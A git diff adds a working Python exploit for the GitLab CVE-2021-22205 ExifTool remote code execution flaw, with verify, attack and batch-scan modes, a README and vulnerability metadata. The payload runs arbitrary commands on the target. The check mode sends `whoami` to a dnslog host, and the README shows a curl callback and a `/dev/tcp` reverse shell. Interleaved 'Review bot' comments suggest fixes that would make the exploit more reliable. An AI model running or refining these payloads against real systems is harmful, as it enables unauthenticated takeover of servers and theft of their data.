diff --git a/cve/gitlab/2021/CVE-2021-22205/CVE-2021-22205.py b/cve/gitlab/2021/CVE-2021-22205/CVE-2021-22205.py
new file mode 100644
index 0000000000000000000000000000000000000000..442dbd08e094bd78a38e8464b7b43c40bf524fe5
--- /dev/null
+++ b/cve/gitlab/2021/CVE-2021-22205/CVE-2021-22205.py
@@ -0,0 +1,120 @@ +import requests +from bs4 import BeautifulSoup +import base64 +import random +import sys +import os +import argparse + +requests.packages.urllib3.disable_warnings() + +def title(): + print(""" + ______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____ + / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___| + | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ + | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) | + \____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/ + + Author:Al1ex@Heptagram + Github:https://github.com/Al1ex + """) + print(''' + 验证模式:python CVE-2021-22205.py -v true -t target_url + 攻击模式:python CVE-2021-22205.py -a true -t target_url -c command + 批量检测:python CVE-2021-22205.py -s true -f file + ''') + +def check(target_url): + session = requests.Session() + try: + req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False) + soup = BeautifulSoup(req1.text, features="lxml") + token = soup.findAll('meta')[16].get("content") + data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{curl `whoami`.82sm53.dnslog.cn} . 
\\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n" + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", + "Connection": "close", + "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5", + "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"} + flag = 'Failed to process image' + req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False) + if flag in req2.text: + print("[+] 目标 {} 存在漏洞".format(target_url)) + else: + print("[-] 目标 {} 不存在漏洞".format(target_url)) + except Exception as e: + print(e) + +def attack(target_url,command): + session = requests.Session() + try: + req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False) + soup = BeautifulSoup(req1.text, features="lxml") + token = soup.findAll('meta')[16].get("content") + data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{"+ command +"} . 
\\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n" + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", + "Connection": "close", + "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5", + "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"} + flag = 'Failed to process image' + req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False) + if flag in req2.text: + print("[+] 目标 {} 存在漏洞".format(target_url)) + print("[+] 请到dnslog或主机检查执行结果") + else: + print("[-] 目标 {} 不存在漏洞".format(target_url)) + except Exception as e: + print(e) + +def scan(file): + for url_link in open(file, 'r', encoding='utf-8'): + if url_link.strip() != '': + url_path = format_url(url_link.strip()) + check(url_path) + +def format_url(url): + try: + if url[:4] != "http": + url = "https://" + url + url = url.strip() + return url + except Exception as e: + print('URL 错误 {0}'.format(url)) + +def main(): + parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE') + parser.add_argument('-v', '--verify', type=bool,help=' 验证模式 ') + parser.add_argument('-t', '--target', type=str, help=' 目标URL ') + + parser.add_argument('-a', '--attack', type=bool, help=' 攻击模式 ') + parser.add_argument('-c', '--command', type=str, help=' 执行命令 ') + + parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ') + parser.add_argument('-f', '--file', type=str, help=' 文件路径 ') + + + args = parser.parse_args() + + verify_model = args.verify + target_url = args.target + + attack_model = args.attack + command = args.command + + scan_model = args.scan + file = args.file + + if verify_model is True and target_url !=None: + check(target_url) + elif attack_model is True and target_url != None and command != None: + attack(target_url,command) + elif scan_model is True and file != None: + scan(file) + else: + sys.exit(0) + +if __name__ == 
'__main__':
+ title()
+ main()
\ No newline at end of file
diff --git a/cve/gitlab/2021/CVE-2021-22205/README.md b/cve/gitlab/2021/CVE-2021-22205/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..405ecc6d439287d6aeff99ab39b6b0b3ad1bec28
--- /dev/null
+++ b/cve/gitlab/2021/CVE-2021-22205/README.md
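Review bot: `type=bool` on the `-v`, `-a` and `-s` options in main() does not parse booleans: argparse passes the raw string to `bool()`, so `-v false` or `-a 0` is truthy and any non-empty value selects that mode; declare them as `parser.add_argument('-v', '--verify', action='store_true', help=' 验证模式 ')` (same for `--attack` and `--scan`), and the existing `is True` comparisons keep working. Separately, the payload in check() hard-codes an out-of-band callback to a third-party dnslog hostname while the verdict is taken only from the `'Failed to process image'` string in the response, so every host scanned by the verify and batch modes is reported to whoever controls that domain without contributing anything to the check; a verification mode should not carry a side-effecting command. scan() never closes the target list — `with open(file, 'r', encoding='utf-8') as fh:` — and format_url() returns None after printing on error, which check() then turns into an AttributeError that its broad `except Exception: print(e)` hides as a one-line message rather than a skipped entry. The request/payload construction is duplicated verbatim between check() and attack(); a single helper taking the command string would keep the two from drifting apart.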
@@ -0,0 +1,97 @@ +### Vuln Impact + +An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. + +### Vuln Product + +- Gitlab CE/EE < 13.10.3 +- Gitlab CE/EE < 13.9.6 +- Gitlab CE/EE < 13.8.8 + +### Environment + +```C +export GITLAB_HOME=/srv/gitlab + +sudo docker run --detach \ + --hostname gitlab.example.com \ + --publish 443:443 --publish 80:80 \ + --name gitlab \ + --restart always \ + --volume $GITLAB_HOME/config:/etc/gitlab \ + --volume $GITLAB_HOME/logs:/var/log/gitlab \ + --volume $GITLAB_HOME/data:/var/opt/gitlab \ + gitlab/gitlab-ce:13.9.1-ce.0 +``` + +### Vunl Check + +##### Basic usage + +```c +python3 CVE-2021-2205.py +``` + +![img](img/usage.png) + +##### Vuln check + +```c +python3 CVE-2021-2205.py -v true -t http://gitlab.example.com +``` + +![img](img/check.png) + +##### command execute + +```c +python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt" +``` + +![attack](img/attack.png) + +```c +python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' 
> /tmp/1.txt" +``` + +![attack_command1](img/attack_command1.png) + +![attack_command2](img/attack_command2.png) + +##### batch scan + +``` +python3 CVE-2021-2205.py -s true -f target.txt +``` + +![scan_result](img/scan_result.png) + +##### Reserve Shell + +``` +python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh" +``` + +![reverse_shell1](img/reverse_shell1.png) + +![reverse_shell2](img/reverse_shell2.png) + +``` +python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh" +``` + +![reverse_shell3](img/reverse_shell3.png) + +![reverse_shell4](img/reverse_shell4.png) + +``` +python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh" +``` + +![reverse_shell5](img/reverse_shell5.png) + +### Reference + +https://github.com/mr-r3bot/Gitlab-CVE-2021-22205 + +https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html \ No newline at end of file diff --git a/cve/gitlab/2021/CVE-2021-22205/img/attack.png b/cve/gitlab/2021/CVE-2021-22205/img/attack.png new file mode 100644 index 0000000000000000000000000000000000000000..390bcd6d6f95ec3a80a2c3b069e04eafea9d25b2 Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/attack.png differ diff --git a/cve/gitlab/2021/CVE-2021-22205/img/attack_command1.png b/cve/gitlab/2021/CVE-2021-22205/img/attack_command1.png new file mode 100644 index 0000000000000000000000000000000000000000..b7184f1ca2bcfb0de24a15b8a9da660b0faa6d9d Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/attack_command1.png differ diff --git a/cve/gitlab/2021/CVE-2021-22205/img/attack_command2.png b/cve/gitlab/2021/CVE-2021-22205/img/attack_command2.png new file mode 100644 index 0000000000000000000000000000000000000000..2161374c7177ed899a20d04ea60fbfcacab4817c Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/attack_command2.png differ 
diff --git a/cve/gitlab/2021/CVE-2021-22205/img/check.png b/cve/gitlab/2021/CVE-2021-22205/img/check.png
new file mode 100644
index 0000000000000000000000000000000000000000..804c9119e22915f56bc351d69c36fdd14d94addc
Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/check.png differ
diff --git a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell1.png b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell1.png
new file mode 100644
index 0000000000000000000000000000000000000000..df8db9339f2689df58cfd1beb4a37c6ec50be24e
Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell1.png differ
diff --git a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell2.png b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell2.png
new file mode 100644
index 0000000000000000000000000000000000000000..6a13757146983f3395ae975ccd6ba9636d63d5ed
Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell2.png differ
diff --git a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell3.png b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell3.png
new file mode 100644
index 0000000000000000000000000000000000000000..4932414343a8e97776176cf3a0d1dc027af7a613
Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell3.png differ
diff --git a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell4.png b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell4.png
new file mode 100644
index 0000000000000000000000000000000000000000..f6a71c19f50b27786021caa70c963ac7c199799b
Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell4.png differ
diff --git a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell5.png b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell5.png
new file mode 100644
index 0000000000000000000000000000000000000000..9fa4c4fdcb22960f3cb32aca19b9575c24c12cd1
Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell5.png differ
diff --git a/cve/gitlab/2021/CVE-2021-22205/img/scan_result.png b/cve/gitlab/2021/CVE-2021-22205/img/scan_result.png
new file mode 100644
index 0000000000000000000000000000000000000000..116c404009f20ed6523c147647b48fd8e6f707e6
Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/scan_result.png differ
diff --git a/cve/gitlab/2021/CVE-2021-22205/img/usage.png b/cve/gitlab/2021/CVE-2021-22205/img/usage.png
new file mode 100644
index 0000000000000000000000000000000000000000..9ac09486e21c7c10206fe8bb026031e09be46b00
Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/usage.png differ
diff --git a/cve/gitlab/2021/CVE-2021-22205/target.txt b/cve/gitlab/2021/CVE-2021-22205/target.txt
new file mode 100644
index 0000000000000000000000000000000000000000..b2cc8425e6894695264601955099a38a52895e1d
--- /dev/null
+++ b/cve/gitlab/2021/CVE-2021-22205/target.txt
@@ -0,0 +1 @@
+http://gitlab.example.com/
\ No newline at end of file
diff --git a/cve/gitlab/2021/yaml/CVE-2021-22205.yaml b/cve/gitlab/2021/yaml/CVE-2021-22205.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..e3d36c9d323bde72ea06faa144e69dcb2830f5e0
--- /dev/null
+++ b/cve/gitlab/2021/yaml/CVE-2021-22205.yaml
@@ -0,0 +1,22 @@
+id: CVE-2021-22205
+source: https://github.com/Al1ex/CVE-2021-22205
+info:
+ name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。
+ severity: critical
+ description: |
+ 2021年4月14日Gitlab官方发布安全更新,披露了CVE-2021-22205 Gitlab exiftool 远程命令执行漏洞,攻击者通过上传恶意图片可触发远程命令执行,控制服务器。近期,互联网上披露CVE-2021-22205 Gitlab exiftool远程命令执行漏洞在野利用事件及其新型利用方式,由于Gitlab某些端点路径无需授权,攻击者可在无需认证的情况下完成图片上传,从而执行任意命令。
+ scope-of-influence:
+ 11.9 <= GitLab(CE/EE)< 13.8.8
+ 13.9 <= GitLab(CE/EE)< 13.9.6
+ 13.10 <= GitLab(CE/EE)< 13.10.3
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-22205
+ - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cve-id: CVE-2021-22205
+ cwe-id: CWE-94
+ cnvd-id: None
+ kve-id: None
+ tags: RCE,cve2021,gitlab
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index deda6b28c6159d9632d63d54ccc297f7c284b878..479880b2101282bf8260a6e0651d5d6024c257aa 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -13,5 +13,7 @@ cve:
 - CVE-2022-2588
 sudo:
 - CVE-2021-3156
+ gitlab:
+ - CVE-2021-22205
 cnvd:
 kve:
\ No newline at end of file
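Review bot: The three version ranges under `scope-of-influence:` carry neither a block-scalar indicator nor list markers, so — assuming they are indented under the key as the diff suggests — a YAML loader folds them into one plain scalar `11.9 <= GitLab(CE/EE)< 13.8.8 13.9 <= GitLab(CE/EE)< 13.9.6 13.10 <= GitLab(CE/EE)< 13.10.3` rather than three separate ranges; write them as a sequence (`- 11.9 <= GitLab(CE/EE) < 13.8.8` per line) or use `|` as `description` already does. `cnvd-id: None` and `kve-id: None` load as the string "None", not a null, so a consumer checking for a missing identifier has to special-case that text; use `~` or an empty value instead. The `tags` value `RCE,cve2021,gitlab` is likewise a single comma-joined string, which is fine only if every consumer of these files splits it the same way — a sequence would remove the ambiguity.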